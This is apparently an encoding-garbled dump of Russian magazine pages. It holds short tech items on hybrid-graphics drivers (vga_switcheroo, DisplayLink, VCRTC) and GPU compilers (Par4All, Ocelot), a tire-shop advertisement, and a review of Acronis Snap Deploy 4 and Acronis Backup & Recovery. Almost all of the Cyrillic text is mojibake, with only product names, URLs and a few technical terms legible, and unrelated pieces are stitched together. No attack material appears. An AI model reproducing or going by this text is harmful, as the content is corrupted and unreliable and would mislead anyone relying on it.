D/%,2%! #'.$&+%- ?&". $%$&'(< +" (,"4"( ),)0"4%7', &';,"0"-4%% NVIDIA Optimus, 5"4#) "#,) 5)/&) "3/)3)&<+)'& +$' "!'/)2%% "&/%$"+5%, ) 1)&'( !/"$&" !'/'#)'& !"097',,"' %1"3/)8',%' #/94"(9 )#)!&'/9 (+ #),,"( $097)' DisplayLink). >$' ,)/)3"&5% 39#9& #"$&9!,< + X-$'/+'/' +'/$%% 1.13, ) &)58' + ,"+". +'/$%% -#/) Linux. A0- ?5$!'/%(',&)&"/"+ #"$&9!,< /'!"1%&"/%% $ 98' !/%(',',,<(% !)&7)(%, %; $!%$"5 ("8," ,).&% ,) $&/),%2' keithp.com/blogs/hotplug-displaylink.

PAR4ALL, EFE DGHGFFIFJKLI >LMENFIKEO KG NP@HQR HQPQ > "#,"( %1 !/'#<#9B%; +<!9$5"+ 89/,)0) (< 98' !%$)0% !/" &';,"0"4%6 GPGPU, 5"&"/)- !"1+"0-'& 1)#'.$&+"+)&: ("B,"$&% 4/)C%7'$5%; !/"2'$$"/"+ #0- 9$5"/',%- +<7%$0',%. + "3<7,<; !/%0"8',%-;. S0)+,". !/"30'(". ?&". &';,"0"4%% $&)0) ,'"3-

;"#%("$&: !'/'!%$)&: 5"(!",',&< !/%0"8',%- ,) $!'2%)0:,"( #%)0'5&' -1<5) N%, #) 'B' % $ /)$7'&"(, 7&" 5"# 39#'& +<!"0,-&:-$- ,) $"&,-; ,'1)+%$%(<; -#'/ "#,"+/'(',,". =&" $%0:," "4/),%-7%0" "30)$&: !/%(',',%- &';,"0"4%% % $9B'$&+',," !"#,-0" !"-/"4 +;"8#',%-, &)5 5)5 #)0'5" ,' 5)8#<. !/"4/)((%$& $!"$"3', ,)!%$)&: +<$"5"/)$!)/)00'0',,<. ?CC'5&%+,<. 5"#.

N ?&". !/"30'(". /'*%0% /)1"3/)&:$- /'3-&) %1 !/"'5&) HPC, /)1/)3"&)+ $!'2%)0:,<. 5"(!%0-&"/ Par4All (www.par4all.org), 5"-&"/<. ("8'& /)$!)/)00'0%&: !/)5&%7'$5% 063". !"$0'#"+)&'0:-,<. 5"#, ,)!%$),,<. ,) -1<5); N% % Fortran. D"097%+ + 5)7'$&+' +;"#,<; #),,<; 5"# !/%0"8',%-, 5"(!%0-&"/ +<#)'& ,) +<;"#' 98' "!&%(%1%/"+),,<. #0- 5",5/'&,". !0)&C"/(< /)$!)/)00'-0',,<. 5"# — ("8," 1)&'( 0%3" $5"(!%0%/"+)&: '4" + %&"4"+"' !/%0"8',%', 0%3" !/"+'$&% #"!"0,%&'0:,96 /97,96 "!&%(%1)2%6 #0- !"097',%- ,)%3"0:*'. !/"%1+"#%&'0:,"$&%.

> 5)7'$&+' !0)&C"/(, #0- 5"&"/<; Par4All $!"$"3', 4','/%/"-+)&: 5"#, 1)-+0',< "3<7,<' (,"4"-#'/,<' !/"2'$$"/<, $%$&'(< $ !"##'/85". CUDA % OpenCL, 50)$&'/< %1 4/)C%7'$5%; !/"2'$-$"/"+. T)#)7) !/"'5&) — !"("7: /)1/)3"&7%5)( + (%4/)2%% %; !/%0"8',%. ,) $"+/'(',,<' (,"4"-#'/,<' $%$&'(< % $%$&'(< $ !"##'/85". &';,"0"4%% GPGPU, ,' 1)$&)+0-- !/"4/)((%$&"+ +,%5)&: + $"+/'(',,<' &';,"0"4%% % &",5"$&% !/"'5&%/"+),%- !)/)00'0:,<; !/%0"8',%..

MU@ AGFJVI? N"+/'(',,<' 4/)C%7'$5%' )#)!&'/< !/'#"$&)+0-6& !"0:1"-+)&'0-( 4"/)1#" 3"0:*' C9,52%",)0:,"$&%, 7'( !/"$&" +<+"# +%#'"%1"3/)8',%-. D"##'/85) (,"4%; %1 ?&%; C9,52%. 98' /')0%1"+),) + "&5/<&<; @N, &"4#) 5)5 #/94%' #" $%; "$&)6&$- ?5$5061%+"( #0- &';, 5&" %$!"0:19'& !/"#952%6 Microsoft. U'( ,' (','' /)3"&) %#'& !"0,<( ;"#"(, % + $5"/"( +/'(',% (< (6,%5-$"%#<) &)58' $("8'( ,)$0)#%&:$- +$'(% 30)4)(% $"+/'(',,". «4/)C%7'$5".» %,#9$&/%%. z

INFO

• !"#$ % %&'(, )*+ vga_switcheroo ,--.-/+*-#* *+012+ % *+" 30()-#, #30& 4'.+ /('#* ,-5.(6#7+ /#, &38+01,+%-7&4 +89&& nomodeset.

• :+"-7'; vga_swit cheroo "+67+ 8#.#'-*1 & %+ %.#"4 ,-5.(,2& 4'.-. <-8.&"#.: hybridopts=ON,IGD,OFF.

• =#>7+0+5&&, 8.&"#-7#77;# % 2+"8&04*+.# Par4All, +37+%-7; 7- "-*#.&-0-> 20-0#*7#5+ -2-'#"&)#32+-5+ &330#'+%-7&4 5+3('-.3*%#77+$ -"#.&2-732+$ &330#'+-%-*#0132+$ 8.+5.-""; «InterProcedural Parallelisation of scientific programs».

• ?-,.-/+*)&2& &, 2+"8-7&& Canonical 3+,'-0& '.-$%#. 5&/.&'7+$ 5.-@&)#32+$ 8+'3&3*#"; GMUX '04 4'.- Linux, 2+*+.;$ 8+-,%+04#* +.5-7&,+%-*1 8#.#20A)#7&# "#6'( 7#32+012&"& GPU & (8.-%04*1 8+'3%#*2+$ B2.-7- 7- 7+(*/(2-> Apple MacBook Pro.

!"#$"%&&'() *+,- .%/0'1 '2 3#&4%5'' Bell Labs 4"6/()%7'+ "6%+'2%8'9 7'"):%+,5;< CRTC-7'/6#3#5)"#++6"#7, 3#)#"%- #=6(461'7%6) 46"65%4"%7+65'6 4'3(6+6> '2 ?"6>&=:?6"% #4"6/6+655#$# GPU 5% /":$#6 :()"#>()7# 7;7#/%. !"' '(4#+,2#7%5'' 7'"):%+,5#$# 3#5)"#++6"% CRTC &#05# &%5'4:+'"#7%), 7;7#/#& '5?#"&%8'' 7 $'="'/5;< ('()6&%< ( 56(3#+,3'&' 7'/6#3%")%&', %=()"%$'":- GPU, 5% 3#)#"#& #(:@6()7+-6)(- "65/6"'5$, ' 564#("6/()7655#6 :()"#>()7# 7;7#/%. A%4"'&6", ( 4#&#@,9 VCRTC &#05# 7;4#+5-), (+#05;> "65/6"'5$ 5% GPU /'(3"6)5#> 3%");, % 7;7#/'), '5?#"&%8'9 16"62 '5)6$"'"#7%55:9 7'/9<:. B"#&6 )#$#, 4"' 4#/3+9165'' 16"62 4#") USB 756C56$#

7'/6#%/%4)6"% DisplayLink &#05# (?#"&'"#7%), (+#05:9 3D-(865: ( '(4#+,2#7%5'6& GPU ()%8'#5%"5#> 7'/6#3%");, % 7;76()' 66 5% 756C599 3%"):. D)# '5)6"6(5#, (?#"&'"#7%7 '2#="%065'6 5% GPU, 5# '(4#+,2#7%7 /+- 7;7#/% /"%>76" V4L2, 7#2&#05# 46"65%4"%7+65'6 (?#"&'"#7%55#$# 5% GPU 4#)#3% 4# (6)', ( 6$# 4#(+6/:9@6> #="%=#)3#> 7 +9=#& 4"'+#065'', 4#//6"0'7%9@6& V4L2 (5%4"'&6", 7 7'/6#4+66"6 VLC).

E 5%()#-@66 7"6&- 4#//6"0'7%6)(- "%=#)% ( /"%>76"#& Radeon ' GPU R6XX, R7XX, Evergreen, Northern Island. E =:/:@6& 4+%5'":6)(- /#=%7'), 4#//6"03: /"%>76"#7 Intel ' Nouveau.

VCRTC: C!?=DEFG<HI C!JIK:K<=?KFFI?H JFL LINUX

E "%&3%< 4"#63)% Ocelot (#2/%6)(- JIT-3#&4'+-)#" /+- CUDA-4"'+#065'>, 4#27#+-9@'> 7;4#+5-), #/5: ' ): 06 4"#$"%&&: 3%3 5% $"%?'16(3'< 4"#86((#"%< NVIDIA, )%3 ' 5% x86 4"#86((#"%<, 7;():4%- 7 "#+' %+,)6"5%)'7;

)6<5#+#$'' OpenCL. B#&4'+-)#" 46"67#/') '5()":38'' GPU 7 =%>)3#/ LLVM, % 2%)6& $656"'":6) (#=()7655;> 3#/ /+- "%2+'15;< 86+67;< %"<')63):". B#&4'+-)#" =;+ 4"#76"65 =#+66 16& 5% ()% 4"'+#065'-< CUDA.

MCKNKJ<HO :KPQ!FL=K? CUDA-Q?!FKRI<!O JFL P<KSKLJI?<HT X86-Q?KUIMMK?KC

¾³© ³±© ¢´«£¼ ²³¡¬© ²©­£¯¬¯­ ¯²¯¢¯¤¯ ²³©¬À © £¼²¯¸¡ª¹¦¤¯ «¡¸¦²³£¡ ¥¬À ¡£³¯­¯¢©¬½®¼¶ ¾®³´¨©¡²³¯£ ²¦£¦±®¯ª ¡­¦±©«©. ²¦¤¯¥®À ­¼ °¯²³¡±¡¦­²À °±©¯³«±¼³½ ¨¡£¦²´ ³¡ª®¼ © °¯®À³½ £ ¸¦­ §¦ ´²°¦¶ ¾³©¶ «¯¬¦²®¼¶ ¥©²«¯£.

©®³¦±®¦³ ­¡¤¡¨©®¼www.allrad.ru(495)730-2927/368-8000/672-7226

www.prokola.net(812)603-2610/603-2611

±¯¨®©¸®¼¦ ­¡¤¡¨©®¼(¨¡¯ ««ÏÌÆÒÎÜÊ ÑàÅ»)

­ÏÒËÃÁÔÌ. ¾ÌÆËÓÑÏÅÎÁà, Å. 14/2(495) 231-4383ÔÌ. ¯ÒÓÑÏÃÉÓàÎÏÃÁ, ÃÌ. 29(499) 724-8044

²ÁÎËÓ °ÆÓÆÑÂÔÑĦËÁÓÆÑÉÎÉÎÒËÉÊ ÐÑ-Ó, Å. 1(812) 603-2610

¯°³¯£¼ª ¯³¥¦¬­ÏÒËÃÁÔÌ. ¾ÌÆËÓÑÏÅÎÁà, Å. 10, ÒÓÑ. 32, (495) 231-2363www.kolrad.ru

1 2£Ï-ÐÆÑÃÜÖ, ÞÓÏ ÒÆÑÝÆÈÎÜÊ ËÏÎÓÑÏÌÝ ËÁØÆÒÓÃÁ ÃÜÐÔÒËÁÆÍÏÊ ÐÑÏÅÔË×ÉÉ. «ÁÇÅÜÊ ÅÉÒË ÐÑÏÖÏÅÉÓ ÎÆÒËÏÌÝËÏ ÔÑÏÃÎÆÊ ÐÑÏÃÆÑËÉ ÐÏ ÑÁÈÌÉØÎÜÍ ÐÁÑÁ-ÍÆÓÑÁÍ. ®ÏÃÆÊÙÆÆ ÓÆÖÎÏÌÏÄÉØÆÒËÏÆ ÏÂÏÑÔÅÏÃÁÎÉÆ ÎÁ ÈÁÃÏÅÁÖ TSW ÅÁÆÓ ÄÁÑÁÎÓÉß ÓÏÄÏ, ØÓÏ ÎÉ ÏÅÉÎ ÅÆÕÆËÓ ÎÆ ÏÒÓÁÎÆÓÒà ÎÆÈÁÍÆØÆÎÎÜÍ. ¥ÆÌÏ Ã ÓÏÍ, ØÓÏ Ë ÐÑÏÉÈÃÏÅÒÓÃÆÎÎÏÍÔ ÐÑÏ×ÆÒÒÔ ÈÅÆÒÝ ÏÓÎÏÒàÓÒà ÓÁËÇÆ ÓÑÆÐÆÓÎÏ, ËÁË É Ë ÐÏÒÌÆÅÔßÚÆÊ ÒÓÁÅÉÉ ÐÑÏ-ÃÆÑËÉ ÉÈÅÆÌÉÊ. £ÒÆ ÞÓÏ ÃÎÉÍÁÎÉÆ É ÈÁÂÏÓÁ ÅÏÖÏÅàÓ ÅÏ ÒØÁÒÓÌÉÃÏÄÏ ÐÏËÔÐÁÓÆÌà Ò ËÁÇÅÜÍ ËÏÌÆÒÎÜÍ ÅÉÒËÏÍ TSW.

£Ï-ÃÓÏÑÜÖ, ÞÓÏ ËÏÍÐÁÎÉà, ËÏÓÏÑÁà ÅÔÍÁÆÓ ÎÆ ÓÏÌÝËÏ Ï ÓÆÖÎÉØÆÒËÏÊ ÒÏÒÓÁÃÌàßÚÆÊ, ÎÏ É ÞÍÏ×ÉÏ-ÎÁÌÝÎÏÊ. ¡ ÐÏÓÏÍÔ ËÁÇÅÜÊ ÄÏÅ ÎÁ ÑÜÎËÆ ÐÏàÃÌà-

ßÓÒà ÒÑÁÈÔ ÎÆÒËÏÌÝËÏ ÍÏÅÆÌÆÊ ÐÆÑÃÏËÌÁÒÒÎÜÖ ËÏÌÆÒÎÜÖ ÅÉÒËÏà TSW. ®ÁÑàÅÔ Ò ÔÎÉÃÆÑÒÁÌÝÎÜÍÉ ÅÉÒËÁÍÉ, ËÏÓÏÑÜÆ ÐÏÅÖÏÅàÓ ÎÁ ÌßÂÏÊ ÁÃÓÏÍÏÂÉÌÝ ÉÎÏÒÓÑÁÎÎÏÄÏ ÐÑÏÉÈÃÏÅÒÓÃÁ (ÐÑÉ ÔÒÌÏÃÉÉ ÐÑÁÃÉÌÝ-ÎÏ ÐÏÅÏÂÑÁÎÎÜÖ ÐÏÒÁÅÏØÎÜÖ ÑÁÈÍÆÑÏÃ), ËÏÍÐÁÎÉà ÃÜÐÔÒËÁÆÓ ÒÐÆ×ÉÁÌÝÎÜÆ ÌÉÎÆÊËÉ ÅÌà ÏÐÑÆÅÆ-ÌÆÎÎÜÖ ÍÁÑÏË ÁÃÓÏÍÏÂÉÌÆÊ. ³ÆÍ ÒÁÍÜÍ ÔÒÉÌÉà ÅÉÈÁÊÎÆÑÏà ÎÁÐÑÁÃÌÆÎÜ ÎÆ ÎÁ ÂÆÒÐÏÑàÅÏØÎÔß ÓÏÌÐÔ ÇÁÇÅÔÚÉÖ ÖÌÆÂÁ É ÈÑÆÌÉÚ (ËÁË ÉÈÃÆÒÓÎÏ, ÃÒÆÍ ÒÑÁÈÔ ÎÆ ÔÄÏÅÉÙÝ), Á ÎÁ ÃÐÏÌÎÆ ÏÐÑÆÅÆÌÆÎÎÜÖ ËÌÉÆÎÓÏÃ Ò ËÏÎËÑÆÓÎÜÍÉ ÈÁÐÑÏÒÁÍÉ É ÐÏÇÆÌÁ-ÎÉàÍÉ. ¯ÓÒßÅÁ ÂÆÈÍÆÑÎÁà ÂÌÁÄÏÅÁÑÎÏÒÓÝ ÓÆÖ, ËÓÏ ÔÇÆ ÒÅÆÌÁÌ ÒÃÏÊ ÃÜÂÏÑ Ã ÐÏÌÝÈÔ TSW, É ÑÁÒÓÔÚÉÊ ÉÎÓÆÑÆÒ ÎÏÃÏÊ ÁÔÅÉÓÏÑÉÉ.

Ñæëìáíá

SYN/ACK !"#$"% &#"'()* (grinder@synack.ru)

!"#$% 09 /164/ 2012120

!"#$"!#, %#"!&%"'(')*+,'- *."%/!#0*, 1)$23%4%$".5 .!(2%#%"6 .)$2."#%&' WAIK (Windows Automated Installation Kit, .&. ."%"6+ «7%&!.8!)/9$ !0/%», ][_01_2009). :2'/."#$//!$ (%")*2/$/'$: /%.")!-0% .)$29 1!")$8*$" /$0!"!)!4! #)$&$/', % # 1!.3$2*+-,$& 0!/;'4*)%<'+ 1)'2$".5 *"!=/5"6 1! &$)$ /$!8>!2'&!."'. ?3%#/!$ 2!."!'/."#! "%0!4! &$"!2% — #!(&!@/!."6 *='"9#%"6 !.!8$//!."' !8!)*2!#%/'5 0%@2!4! 0!&16+"$)% ' 8*2*,$4! )%8!=$4! &$."%. A)*4!- 1!2>!2 0 %#"!&%"'(%<'' 1)!<$2*)9 )%(-#$)"9#%/'5 (%03+=%$".5 # 03!/')!#%/'' .'."$& '( .!(2%//!4! 2'.0!#!4! !8)%(%. B)'/<'1 #$.6&% 1)!.": *."%/%#3'#%$& /% C%83!//9- BD E7 ' #.$ /*@/9$ 1)'3!@$/'5, (%"$& 03!/')*$&

E2/% '( 43%#/9> (%2%= IT-.3*@89 — !8$.1$='"6 /$-1)$)9#/!."6 '/;!)&%<'!//9> 1)!<$..!# #.$4! 1)$21)'5"'5 ' 0%@2!4! $4! 1!2)%(2$3$/'5. D!42% 1)'!8)$"%+".5 /!#9$ .'."$&9 '3' #9>!25" '( .")!5 BD, )%8!='$ &$."% !89=/! 1)!."%'#%+" — % F"! *89"0' 235 8'(/$.%. B!F"!&* !=$/6 #%@/! /%*='"6.5 )%(#$)"9#%"6 E7 ' 1)'3!@$/'5, #!.."%/%#-3'#%"6 '> )%8!"!.1!.!8/!."6 ' 1!#)$@2$//9$ (1!>',$//9$) 2%//9$ # 0)%"=%-C'$ .)!0'.

%&'()*+,-. / +&0-*1/-.

!"#$"% &#"'()* (grinder@synack.ru)

GHIGHJ:GK: ACRONIS SNAP DEPLOY L (%#'.'&!."' !" .")*0"*)9 !)4%/'(%<'' ' 0!3'=$."#% 03'-$/".0'>/.$)#$)/9> .'."$& 1)!<$.. )%(#$)"9#%/'5 E7, 2)%--#$)!# ' 1)'3!@$/'- &!@$" 89"6 2!."%"!=/! .3!@/9& ' (%/5"6 2!."%"!=/! &/!4! #)$&$/'. J"!89 !83$4='"6 ")*2 .'.%2&'/!#, # /$2)%> Microsoft )%()%8%"9#%$".5 <$39- )52 .1$<'%36-/9> '/.")*&$/"!# (Windows Deployment Services, Microsoft Deployment Toolkit ' System Center Configuration Manager), !8$.1$='#%+,'> #!(&!@/!."6 *."%/!#0' E7 . 1!.3$2*+,'& /%-0%"!& #.$4!, ="! /*@/!, 1)' 1!&!,' 4!"!#9> /%.")!$0. B)' F"!& WIM-!8)%( (Windows Imaging Format) .! #.$&' 1%"=%&' ' ;%-3

!"#"$%& ACRONIS '(& )*+,-)+%.)/%% 01+)$,*2% ,1 $) -$,3"1+*, 2,-456+"!,* % ,!7)$%.)/%% /"$+!)(%-.,*)$$,7, !"."!*%!,*)$%& * 7"+"!,7"$$89 1"+&9

!"#$%&'()* + '",)&-+)*

!"#$% 09 /164/ 2012 121

,+,)%.'/0 &"#1%2 + &"#.'-3"%. %4- '" -,)"2*'/% 56. 7)2+8'/0 ,9-,-:, ;-41" '(3'- &"#$%&'()* +2+ $-,,)"'-$+)* &":-)-,9--,-:'-,)* .'-3%,)$" ,+,)%. ,)"'1"&)'-0 ;-'<+4(&"=++, $ )-. 8+,2% $ $+&)("2*'-0 ,&%1%. >)-) $"&+"') 9&-?% + 9-'@)'%0 $ &%"2+#"=++ + :/,)&%% 9&+ &"#$%&)/$"'++, A-)@ '% )";-0 4+:-;+0, ;"; 9&%1/1(?+0, 9-,;-2*;( 9&+ +#.%'%'++ ,-,)"$" 57 +2+ 9&+ +,9-2*#-$"'++ 1&(4-4- -:-&(1-$"'+@ '%-:A-1+.- ,-#1"$")* '-$/0 -:&"# (;,)")+, '+;)- '% .%B"%) 9-14-)-$+)* '%,;-2*;- ,2%9;-$, 8)-:/ -A$")+)* $,% ,+)("=++).

C Acronis Snap Deploy +,9-2*#(%),@ $)-&-0 $"&+"'), '- ,- ,$-+.+ 'D"',".+. C -:?%. + =%2-. 9&-=%,, $/42@1+) ,2%1(D-?+. -:&"#-.. E1.+'+,)&")-& ,-#1"%) .",)%&--:&"# F)"2-''-4- 56 , 9&%1(,)"'-$2%''-0 Windows +2+ Linux + -)9&"$2@%) %4- '" ,%&$%&. G-$/0 56 9&+ 9-.-?+ PXE #"4&(3"%) ,9%=+"2*'/0 "4%'), ;-)-&/0 #";"8+$"%) + &"#$-&"8+$"%) -:&"#. H,2+ BIOS ;-.9*D)%&" '% 9-11%&3+$"%) ,%)%$(D #"4&(#;(, "4%') .-3'- #"9(,)+)* 9&+ 9-.-?+ #"4&(#-8'-4- CD/DVD, USB +2+ 1+,;%)/, ;-)-&/% ,-#1"D),@ 9&+ 9-.-?+ ,".-4- ASD. 5-11%&3+$"%),@ +'1+$+1("2*'"@ (12@ ;-';&%)'-4- IEJ) +2+ .'-4-"1&%,'"@ 9%&%1"8" (IP — 239.255.219.45), 9-#$-2@D?"@ &"#$%&'()* -1'--$&%.%''- '%,;-2*;- ,+,)%., ,'+3"@ )%. ,"./. '"4&(#;( '" ,%)* + (,;-&@@ 9&-=%,, $$-1" 56 $ F;,92(")"=+D. K";3% $-#.-3'" (,)"'-$;" #'"8%'+@ TTL 12@ .'-4-"1&%,'-0 &",,/2;+, 8)- 9-#$-2+) -4&"'+8+)* &",9&-,)&"'%'+% ,%)%$/A 9";%)-$ 8%&%# B2D#/. C,% 1%0,)$+@ #"'-,@),@ $ 3(&'"2, 9-F)-.( 9&-,2%1+)* ,-:/)+@ ,-$,%. '% ,2-3'-.

L":2-''/0 -:&"# .-3'- &"#$%&'()* $&(8'(D +2+ 9- &",9+-,"'+D. 5&%1(,.-)&%'- )"; '"#/$"%.-% «-9%&")+$'-%» ,-#1"'+% -:&"#", ;-)-&-% 9&-+#$-1+),@ '" &":-)"D?%0 ,+,)%.%. M2@ F)-4- '" 56 1-23%' :/)* (,)"'-$2%' "4%'), ;-)-&/0 )";3% 9-9"1%) '" 1+,;, 8)- '% $,%41" 3%2")%2*'-. 5-F)-.( :-2%% &"=+-'"2*'/. ,8+)"%),@ "$)-'-.'-% ,-#1"'+% -:&"#", ;-41" ;-.9*D)%& #"4&(3"-%),@ 9&+ 9-.-?+ #"4&(#-8'-4- '-,+)%2@ Acronis. H,2+ ;-.9*D)%& ,-1%&3+) '%,;-2*;- 1+,;-$ + &"#1%2-$, .",)%& ,-#1"'+@ -:&"#" 9-#$-2@%) -)-:&")* '(3'/% ('% 9-11%&3+$"D),@ 1+'".+8%,;+% 1+,;+ + 1+,;+ , GPT).

7N!EOP, 7N!EOP 78%'* (1-:'-, 8)- $ ;"8%,)$% F)"2-''-4- .-3%) :/)* +,9-2*#-$"' -:&"#, ;-)-&/0 ,-#1"%),@ 9&-4&"..-0 &%#%&$'-4- ;-9+&-$"'+@ Acronis True Image +2+ Acronis Backup & Recovery. O" ,8%) F)-4- 9&+ -&4"'+#"=++ 9%&+-1+8%,;-4- :F;"9+&-$"'+@ ,'+."D),@ $,% $-9&--,/ -: ";)("2*'-,)+ 57 + '"2+8++ $,%A #"92")-; 12@ ;"31-4- A-,)". C $%&,++ ASD 4 )";3% 9-11%&3+$"%),@ Virtual Hard Disk (VHD), ,-#-1"''/0 9&-4&"..-0 "&A+$"=++ Win7, Virtual PC +2+ Acronis. 5-F)-.( )";"@ ,A%." (1-:'" '% )-2*;- 12@ &"#$%&)/$"'+@ 7J '" 4-2-%

3%2%#-, '- + 12@ :/,)&-4- $-,,)"'-$2%'+@ +2+ $-#$&")" ,+,)%./ $ +,A-1'-% ,-,)-@'+%. 5-,2%1'%% .-3%) 9-'"1-:+)*,@ 9&+ -:(8%'++ +2+ $ )-. ,2(8"%, ;-41" ;-.9*D)%&-. 9-2*#(D),@ '%,;-2*;- 8%2-$%; ('"9&+.%&, $ +')%&'%)-;"<%). 5&%1(,.-)&%'- + )"; '"#/$"%.-% 9-2*#-$")%2*,;-% &"#$%&)/$"'+%, ;-41" %4- +'+=++&(%) ,". 9-2*-#-$")%2*, $/:&"$B+0 ,--)$%),)$(D?+0 9(';) $ .%'D #"4&(#;+ 7J.

7:&"# .-3%) :/)* ,-A&"'%' '" 3%,);+0 1+,; ,%&$%&" (&%;-.%'-1(%),@), ,%)%$-0 &%,(&,, CD/DVD/Blu-ray +2+ USB-(,)&-0,)$-. H,2+ -:&"# '% 9-.%?"%),@ '" -1+' CD/DVD, :(1%) #"9&-B%' ,2%1(D?+0. 5-11%&3+$"%),@ '%,;-2*;- ,)%9%'%0 ,3")+@, '- F)- 9-)&%:(%) :-2*B%4- $&%.%'+ + &%,(&,-$.

5&+ 9-.-?+ ASD 9-11%&3+$"%),@ (,)"'-$;" 7J Windows, '"8+-'"@ , NT/98, + Linux, ,'@)+% -:&"#-$ , <"02-$/A ,+,)%. FAT, NTFS, ext2/3/4, ReiserFS, Reiser4, XFS, JFS + Linux Swap. 5&%1(,.-)&%'- 9-,%;)-&'-% ,'@)+% -:&"#" + &"#$%&)/$"'+% 7J , -<+=+"2*'- '% 9-11%&3+$"%./A QJ.

57RHOGPH QSTS C 9&-=%,,% &"#$%&)/$"'+@ ,-$&%.%''/A Windows-$%&,+0 ASD 9--#$-2@%) +#.%'+)* '%;-)-&/% 9"&".%)&/ — +.@, ,%)%$/% '",)&-0-;+, 82%',)$- $ 1-.%'% / &":-8%0 4&(99%, +1%')+<+;")-& :%#-9",-'-,)+ SID (Security Identifier), 2+=%'#+D. >)+. ASD -)2+8"%),@ -) 1&(4+A 9-1-:'/A ,+,)%. ;2-'+&-$"'+@ 7J, ;-)-&/%, ;"; 9&"$+2-, '% (.%D) (9&"$2@)* SID, +, 8)-:/ ,1%2")* %4- ('+;"2*'/., 9&+-A-1+),@ #"1%0,)$-$")* 1-9-2'+)%2*'/0 +',)&(.%') — Sysprep (System Preparation Tool).

K";3% '" =%2%$-0 ."B+'% .-3'- #"9(,)+)* 9&+2-3%'+% +2+ ,;&+9), ,;-9+&-$")* <"02/. M2@ (1-:,)$" .-3'- ,-#1"$")* B":2-'/ &"#$%&)/$"'+@ + +,9-2*#-$")* +A $ 9-,2%1(D?%.. H?% -1+' $"3'/0 .-.%') — 9&-4&".." (.%%) +#.%'@)* &"#.%& )-.-$ $ #"$+,+.-,)+ -) '"2+8+@ ,$-:-1'-4- .%,)" '" =%2%$-. 1+,;%, 9-14-'@@ +)-4-$/0 &"#.%& (&",)@4+$"@) +2+ -,)"$2@@ %4- ;"; %,)* (, '%#"'@)/. 9&-,)&"',)$-.).

5&-:2%.( (,)"'-$;+ 7J '" -:-&(1-$"'++, -)2+8'-. -) .",)%&-56, &%B"%) 1-9-2'+)%2*'/0 .-1(2* Acronis Universal Deploy (AUD), ;-)-&/0 9-,)"$2@%),@ #" -)1%2*'(D 92")( + ,9-,-:%' "$)-.")+8%-,;+ '",)&"+$")* 1&"0$%&/ Windows.

67I57GHGKP ASD M2@ &%B%'+@ 9-,)"$2%''/A #"1"8 ASD +,9-2*#(%) '%,;-2*;- ;-.9-'%')-$: ,%&$%& &"#$%&)/$"'+@ (Deploy Server), ;-',-2* (9&"$2%'+@, PXE-,%&$%&, "4%') (9&"$2%'+@ + ,%&$%& 2+=%'-#+0, ;-)-&/% .-4() :/)* (,)"'-$2%'/ '" 56 9-1 (9&"$2%'+%. Windows XP + $/B%. H?% -1+' ;-.9-'%') — Wake-on-LAN Proxy — 9-#$-2@%) $;2D8")* ;-.9*D)%&/, '"A-1@?+%,@ $ 1&(4-0

! "#$%&' ( Acronis Snap Deploy %)'*+ ,%-%.#/& -#(&'"0

1#(&"%23# ,#"#-'&"%4 PXE-#.'*&# 4 %3*' 3%*(%56 Acronis Snap Deploy

SYN/ACK

!"#$% 09 /164/ 2012122

!"#"!$%!&$'(%" )'((*+ , ACRONIS BACKUP & RECOVERY ASD -.//0 123.405 67849 849:/;4, 26 2/ .6</0 94./2305 1=/>34;3-9386?422@/ =83;6</23A :;A 8/9/8?26B6 C6=386?423A. D6;2@/ C6=33 E48:4, ?C;FG4FH3/ =6;596?40/;51C3/ :422@/, 7-:-0 9423.405 924G30/;526/ ./106, B8-9305 1/05 3 08/76?405 76;5I3E 8/1-816? :;A 6784760C3. J86./ 06B6, 24K03 3 ?6110426?305 60:/;5-2@K L4K; 1 /B6 =6.6H5F =867;/.403G26, =83:/01A 849?684G3?405 ?/15 67849. D6M06.- ? :4226. 1;-G4/ 10630 67840305 ?23.423/ 24 76;// B37C3/ 1=/>34;39386?422@/ 8/I/23A, 24=83./8 24 Acronis Backup & Recovery (ABR), C6068@K A?;A/01A =86:6;</23/. ;32/KC3 =6=-;A826B6 Acronis True Image. ABR =8/:24924G/2 :;A 169:423A 8/9/8?2@E C6=3K 3 ?6110426?;/23A :422@E 24 :/1C06=4E, 1/8?/-84E 3 ?380-4;52@E .4I324E (VMware, Hyper-V, XenServer, Red Hat Enterprise Virtualization 3 Parallels Server). (/67E6:3.@/ L-2C>33 8/4;396?42@ 1660?/010?/226 ? ?/813AE Workstation, Server 3 Virtual Edition. , =6.6H5F ABR .6<26 947MC4=305 ?/15 </10C3K :31C, 849-:/; (=67;6G26/ 3 =61/C06826/ C6=386?423/) 3;3 60:/;52@/ =4=C3 3 L4K;@ =6 ?@768- =6;596?40/;A. N410/8 169:423A 8/9/8?2@E C6-=3K =69?6;A/0 -C49405 I47;62@ L4K;6?, C6068@/ 2-<26 31C;FG305, =6M06.- 8/9-;5040 7-:/0 16:/8<405 06;5C6 06, G06 :/K10?30/;526 ?4<26. ,69:422@K 67849 .6<26 =861.4083?405 ? D86?6:23C/ C4C 67@G2-F =4=C- 3;3 =6:C;FG305 C 1310/./ C4C :31C 3 84760405 1 23. ? 8/<3./ G0/23//94=315 3;3 06;5C6 G0/23/. D83 M06. :;A 169:423A C6=33 2/0 2/67E6:3.6103 610424?;3?405 1310/.-.

D6 184?2/23F 1 ASD =6::/8<3?4/01A 76;5I// C6;3G/10?6 03=6? :31C6?: MBR 3 GPT, 7496?@/ 3 :324.3G/1C3/. !41=6924F01A :422@/ MS Exchange 3 SQL Server, =6M06.- 4:.3231084068 .6</0 24K03 3 ?6110426?305 C6=3F =315.4 3;3 ;F76B6 L4K;4. D8/:-1.6-08/24 ?69.6<26105 I3L86?423A 3 1<403A 8/9-;5038-FH/B6

=6:1/03, C-:4 2/ =86E6:30 13B24; Wake-on-LAN. J6.=62/20@ .6<26 -10424?;3?405 24 6:2- 3;3 8492@/ .4I32@. OG30@?4A, G06 Deploy Server 67@G26 E84230 ?1/ 67849@, .6</0 =624:67305-1A E48: 76;5I6K /.C6103. );A C6216;3 -=84?;/23A =6:6K:/0 67@G2@K DJ, 847604FH3K =6: -=84?;/23/. :/1C06=26K ?/8133 Windows. P4C</ 1 =6.6H5F C6216;3 .6<26 -10426?305 24 -:4-;/22@/ 1310/.@ 6104;52@/ C6.=62/20@ ASD, :;A G/B6 2/67E6-:3.6 =/8/K03 ? «,/8?31 Æ O10426?305 C6.=62/20@ -:4;/226», 940/. ?@78405 2-<26/ ? %ProgramFiles%\Common Files\Acronis\SnapDeploy\RemoteInstall 3 -C49405 IP 3;3 3.A DJ. D83 M06. =6-08/7-F01A =84?4 4:.32310840684. "1;3 -:4;/22@K DJ 847604/0 =6: -=84?;/23/. 